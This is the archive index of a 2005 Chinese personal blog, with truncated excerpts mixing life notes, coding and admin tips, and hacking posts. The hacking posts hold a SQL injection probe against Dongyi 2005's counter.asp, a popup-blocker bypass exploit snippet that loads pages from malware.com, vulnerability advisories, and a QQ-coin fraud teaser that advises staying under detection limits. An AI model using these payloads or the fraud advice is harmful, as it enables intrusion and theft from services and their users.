Entries from 2005-07-01 to 1 month

准备南下去了

心情乱笔

现在在湘潭,明天就到郴洲,再过二天后去家里桂阳去,8月6号去广州.忙,有事mail: hsmw26836659@hotmail.com 做技术的不去技术力量高的的地方闯闯,不知道自己呆的小地方技术是多么的落后. 从广州,深圳回来的朋友说,到小地方或许你是某某人眼中个人才,你南下看看…

不要说BT

黑客入侵方面

http://images.blogcn.com/2005/7/30/9/26836659,2005073017757.jpg http://images.blogcn.com/2005/7/30/9/26836659,2005073017625.jpg

华为失败

心情乱笔

投了个简历给华为. 华为回话了,说你们的专业和他们这次需要的不符合 我需要的顾问是这样的: 1.可以指导公司级信息安全工作,(华为是一家超过2万人的公司,产品是核心通信网络,包括数据通信网络,产品半数以上销往欧洲等国际市场,本身已经有大量从事信息…

BT TV

网络文摘

http://www.pplive.com/source.shtml

TEST

心情乱笔

/*100快钱要卖100只鸡。公鸡5快一只,母鸡3快一只,小鸡1快3只。求有多少种 方法,分别是那几中。*/ #include #include main() {/* //5*coks+3*hens+chincks/3=100;&&coks+hens+chincks=100;*/ int coks,hens,chincks; int n=0;/* //符合100钱买100鸡的数据…

XP与WIN2000,WIN2003自动登陆的方法

网络文摘

XP与WIN2000,WIN2003自动登陆的方法 XP与WIN2000,WIN2003自动登陆的方法 WIN 2000系统 打开控制面板–用户和密码:把要使用本机,用户必须输入用户名和密码前面的复选框去掉,然后点击确定,系统提示必须有一个自动登陆的用户与密码。这时候输入自动登陆的用…

跨站

黑客入侵方面

利用记录手段提交语句实施第三方网站跨站攻击.这方法够毒的。在8进制的网站成功了。还好冰血不知…ing.

最新刷qq币方法!!!!!!!

黑客入侵方面

最新刷qq币方法!!!!!!! 昨天刷了500个QQ币,和大家说说方法,最新刷QB的漏洞!因为本漏洞过几天估计会被封,提醒大家:一般情况下,一部固定电话或小灵通一个月刷的Q币没有超过200个 是不会被腾讯发现被冻结帐户的,如果一个月刷的Q币超过了200个为了…

刷泡泡点卷

黑客入侵方面

http://pay.shanda.com.cn/Deposit_promotion/bnb_promotion/index.asp

动易2005 出问题了。

黑客入侵方面

据悉,动易2005 出问题了。问题文件是counter.asp 可惜的争对sql版.哎. count/counter.asp?referer=’

2003iis 默认 200K 解决办法

黑客入侵方面

新建一个文本文件,内容如下: ‘—————————————————- set providerObj=GetObject(“winmgmts:/root/MicrosoftIISv2”) set vdirObj=providerObj.get(“IIsWebVirtualDirSetting=’W3SVC/1/ROOT'”) WScript.Echo “Before: ” & vdirObj.AspMaxRequestEntityAllowed …

惭愧

心情乱笔

编译了个MS05037的exp,无意发现无敌公布的修改版的exp.一比哎,水平高低马上见分晓.惭愧. 闭关修炼,继续努力.

一些不错的国外安全站点 ^_^

网络文摘

http://www.megasecurity.org http://www.k-otik.com/ http://www.derkeiler.com/ http://www.backtrace.de/ http://sourceforge.net/ http://lists.netsys.com/ http://www.blackhat.com/ http://www.phenoelit.de/ http://www.hbgary.com/ http://www.immu…

Microsoft Windows HTML Help Scripting

网络文摘

HSMW A {behavior:url(#default#AnchorClick);} drag and drop this

Windows XP SP2广告弹出控制插件绕过漏洞

网络文摘

function shellscript() { open(“http://www.malware.com/flywin.html”,”_blank”,”scrollbar=no”); showModalDialog(“http://www.malware.com/flywin.html”); } function main() { x.DOM.Script.execScript(shellscript.toString()); x.DOM.Script.setTimeou…

Joekoe CMS 3.0 SQL注入

黑客入侵方面

Joekoe CMS 3.0 SQL注入 漏洞发现:focn[B.C.T] 网站组织:Bug.Center.Team 漏洞程序:Joekoe CMS 3.0 体验版 Joekoe CMS 3.0 正式版 漏洞类型 SQL注入攻击 漏洞详述 Post.asp页面存在对用户提交变量过滤不严,可导致SQL注入攻击。 漏洞测试:不公布 和动网大同…

假期…..

心情乱笔

一个人度(在湘潭),过二个月的假期(学校放假).要学三门编程(SQL.C.Linux编程),做四份工作(写稿件,维护服务器,网吧,跑业务).忙啊。不过最对不起的还是我的五个MM(…….)

动网论坛权限提升漏洞

网络文摘

动网论坛权限提升漏洞 文章作者:focn & jinsdb 在6月份的黑防上看到《动网7.1漏洞惊现江湖》一文,说是admin_postings.asp文件 存在注入漏洞,但利用的前提是拥有超级斑竹或前台管理员权限。我想起以前发现的动网7.x版本存在一个前台权限提升漏洞, 正好可…